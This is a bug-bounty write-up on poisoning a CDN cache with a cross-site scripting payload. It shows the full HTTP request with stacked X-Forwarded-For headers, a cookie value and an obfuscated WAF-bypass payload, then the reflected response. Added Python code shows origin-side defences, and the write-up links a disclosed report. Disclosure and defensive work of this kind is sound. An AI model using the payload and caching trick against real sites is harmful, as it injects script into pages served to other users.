How I Made $16,500 Hacking CDN Caching Servers — Part 2

@bxmbn

bombon
InfoSec Write-ups


A Nice Way To Hide XSS

Bounty: $2,000

While Google Dorking, I found a particular URL. This time the response was not being cached, but if I appended a cacheable file extension (.js, .css) to the end of the URL, the CDN would cache the response.

Now all I needed was to find an XSS. I found an injection point in a cookie, but the WAF would trigger when I added anything after %20:

Cookie: cookiename=xss</script%20

While trying to bypass the WAF, I realized that my IP address was also being reflected in that same script:

guid="</script ","24.99.19.20"

Since my IP was being reflected, I tried the “X-Forwarded-For” header. This way I could close the <script> tag and avoid the WAF, which would trigger if it detected <[anything]> in a single value.

This is why you will see three “X-Forwarded-For” headers in the request.

Request:

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`//
X-Forwarded-For: >
Cookie: gdId=xss</script%20

Response:

...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...

After poisoning the cached URL with the XSS, an attacker just needed to send it to the victim:

redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121

A nice way to hide XSS :D
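Two origin-side controls that would have broken this chain, as an added example that is not part of the original write-up: treat X-Forwarded-For as a list of IP addresses (and log multiple headers or non-IP values as an anomaly) instead of reflecting it, and serialise anything placed inside an inline script so a value like `</script ` cannot close the tag. The function names are mine, and the sample headers and address are constructed from the request shown above.

```python
import ipaddress
import json
from typing import List, Tuple

# Constructed sample: the three forwarded headers from the write-up's request,
# plus the address the origin actually reflected into its inline script.
SAMPLE_XFF = ["xss", "xss><svg/onload=globalThis[`al`+/ert/.source]`1`//", ">"]
SAMPLE_REMOTE_ADDR = "24.99.19.20"


def validated_client_ip(xff_headers: List[str], remote_addr: str) -> Tuple[str, List[str]]:
    """Pick a client IP from X-Forwarded-For without trusting arbitrary text.

    Returns (ip, findings). Every hop in every header must parse as an IP
    address; if anything does not, or more than one header was sent, the
    TCP peer address is used instead and the anomalies are returned for logging.
    """
    findings: List[str] = []
    if len(xff_headers) > 1:
        findings.append(f"{len(xff_headers)} X-Forwarded-For headers in one request")
    hops: List[str] = []
    for header in xff_headers:
        for hop in header.split(","):
            hop = hop.strip()
            try:
                hops.append(str(ipaddress.ip_address(hop)))
            except ValueError:
                findings.append(f"non-IP X-Forwarded-For value: {hop!r}")
    if findings or not hops:
        return remote_addr, findings
    # The last hop was appended by the proxy directly in front of the origin;
    # earlier hops are whatever the client chose to send.
    return hops[-1], findings


def safe_script_literal(value: str) -> str:
    """Serialise a value for embedding inside an inline <script> block.

    json.dumps escapes quotes and control characters; escaping "</" as "<\\/"
    also stops the HTML parser from seeing a closing </script> tag, which is
    what the "</script " cookie value in the write-up relied on.
    """
    return json.dumps(value).replace("</", "<\\/")


if __name__ == "__main__":
    ip, findings = validated_client_ip(SAMPLE_XFF, SAMPLE_REMOTE_ADDR)
    print(f"client ip used: {ip}")
    for finding in findings:
        print(f"alert: {finding}")
    print("guid=" + safe_script_literal("</script "))
```

Run against the sample request, the three forwarded headers produce four findings and the reflected value falls back to the peer address, so nothing attacker-controlled reaches the cached script body.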

This was my favorite cache poisoning finding, and it was found on a public program:

https://hackerone.com/reports/1424094

Timeline:

Reported → December 11, 2021

Triaged → December 14, 2021

Bounty Awarded → January 7, 2022

Fixed → March 7, 2022

Next:

Part 3: Cache Poisoning DoS Via X-Forwarded-Scheme Header
